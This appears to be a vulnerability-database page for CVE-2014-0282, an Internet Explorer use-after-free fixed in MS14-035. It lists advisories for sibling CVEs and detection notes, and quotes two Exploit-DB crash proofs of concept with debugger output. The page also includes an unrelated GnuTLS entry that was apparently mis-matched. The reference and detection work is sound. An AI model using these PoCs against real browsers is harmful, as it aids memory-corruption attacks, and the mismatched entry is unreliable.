CVE-2014-0282
published 2014-06-11CVE-2014-0282: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web…
PriorityP265critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
46.77%
98.7th percentile
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, CVE-2014-1803, and CVE-2014-2757.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Use-after-free triggered via CInput element freed during CFormElement::DoReset execution; look for form reset events combined with innerHTML destruction and garbage collection calls in JavaScript ↗
- →Exploit leverages onpropertychange event handler on a checkbox element to trigger the use-after-free during a form reset; monitor for onpropertychange handlers on form input elements combined with form.reset() calls ↗
- →Crash occurs in mshtml!CFormElement::DoReset when accessing a freed CInput element; crash/AV at this function is a strong indicator of CVE-2014-0282 exploitation ↗
- ·The provided exploit is a PoC crash/DoS only (MS14-035); it does not include a working code-execution payload. Affected versions span IE 6 through 11 per NVD, but the PoC specifically targets IE 8/9/10. ↗
- ·CVE-2014-0282 is one of several distinct memory-corruption vulnerabilities patched under MS14-035; detections must not conflate it with CVE-2014-2757, CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, or CVE-2014-1803. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r53f-q2x3-jp6c: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-1779 [CRITICAL] CWE-119 GHSA-r53f-q2x3-jp6c: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0282, CVE-2014-1775, CVE-2014-1799, CVE-2014-1803, and CVE-2014-2757.
GHSA
GHSA-jgr5-wvwf-q7gg: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-1799 [CRITICAL] CWE-119 GHSA-jgr5-wvwf-q7gg: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0282, CVE-2014-1775, CVE-2014-1779, CVE-2014-1803, and CVE-2014-2757.
GHSA
GHSA-cq4f-84mv-f5xv: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-1803 [CRITICAL] CWE-119 GHSA-cq4f-84mv-f5xv: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0282, CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, and CVE-2014-2757.
GHSA
GHSA-qj5w-qghv-rh24: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-1775 [CRITICAL] CWE-119 GHSA-qj5w-qghv-rh24: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0282, CVE-2014-1779, CVE-2014-1799, CVE-2014-1803, and CVE-2014-2757.
GHSA
GHSA-q6hw-jw9v-7j54: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-2757 [CRITICAL] CWE-119 GHSA-q6hw-jw9v-7j54: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0282, CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, and CVE-2014-1803.
GHSA
GHSA-x6r4-v6w5-36cr: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-0282 [CRITICAL] CWE-119 GHSA-x6r4-v6w5-36cr: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, CVE-2014-1803, and CVE-2014-2757.
OSV
gnutls26, gnutls28 vulnerabilities
osv·2015-03-23·CVSS 4.3
CVE-2014-8155 gnutls26, gnutls28 vulnerabilities
gnutls26, gnutls28 vulnerabilities
It was discovered that GnuTLS did not perform date and time checks on
CA certificates, contrary to expectations. This issue only affected
Ubuntu 10.04 LTS. (CVE-2014-8155)
Nikos Mavrogiannopoulos discovered that GnuTLS incorrectly verified that
signature algorithms matched. A remote attacker could possibly use this
issue to downgrade to a disallowed algorithm. This issue only affected
Ubuntu 10.04 LTS, Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2015-0282)
It was discovered that GnuTLS incorrectly verified certificate algorithms.
A remote attacker could possibly use this issue to downgrade to a
disallowed algorithm. (CVE-2015-0294)
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)
exploitdb·2014-07-08
CVE-2014-2782 Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)
Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)
---
loaded = false ;
function func() {
if (loaded) {
document.body.innerHTML = "" ; // free CFormElement
}
}
input1 = document.getElementById("input1") ;
input1.onclick = func ;
loaded = true ;
input1.click(); // Call DoClick function
p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20 6661ead8 MSHTML!CFormElement::`vftable'
0:005> !heap -x esi p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034
Exploit-DB
Microsoft Internet Explorer 8/9/10 - 'CInput' Use-After-Free Crash (PoC) (MS14-035)
exploitdb·2014-06-24
CVE-2014-0282 Microsoft Internet Explorer 8/9/10 - 'CInput' Use-After-Free Crash (PoC) (MS14-035)
Microsoft Internet Explorer 8/9/10 - 'CInput' Use-After-Free Crash (PoC) (MS14-035)
---
MS14-035 Internet Explorer CInput Use-after-free POC
Test check
var startfl=false;
function changer() {
// Call of changer function will happen inside mshtml!CFormElement::DoReset call, after execution of this function crash in DoReset will happen when accessing freed CInput element
if (startfl) {
document.getElementById("testfm").innerHTML = ""; // Destroy form contents, free next CInput in DoReset
CollectGarbage();
}
}
document.getElementById("child2").checked = true;
document.getElementById("child2").onpropertychange=changer;
startfl = true;
document.getElementById("testfm").reset(); // DoReset call
kb
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following f
http://www.exploit-db.com/exploits/33860http://www.osvdb.org/107851http://www.securityfocus.com/bid/67862http://www.securitytracker.com/id/1030370https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-035http://www.exploit-db.com/exploits/33860http://www.osvdb.org/107851http://www.securityfocus.com/bid/67862http://www.securitytracker.com/id/1030370https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-035
2014-06-11
Published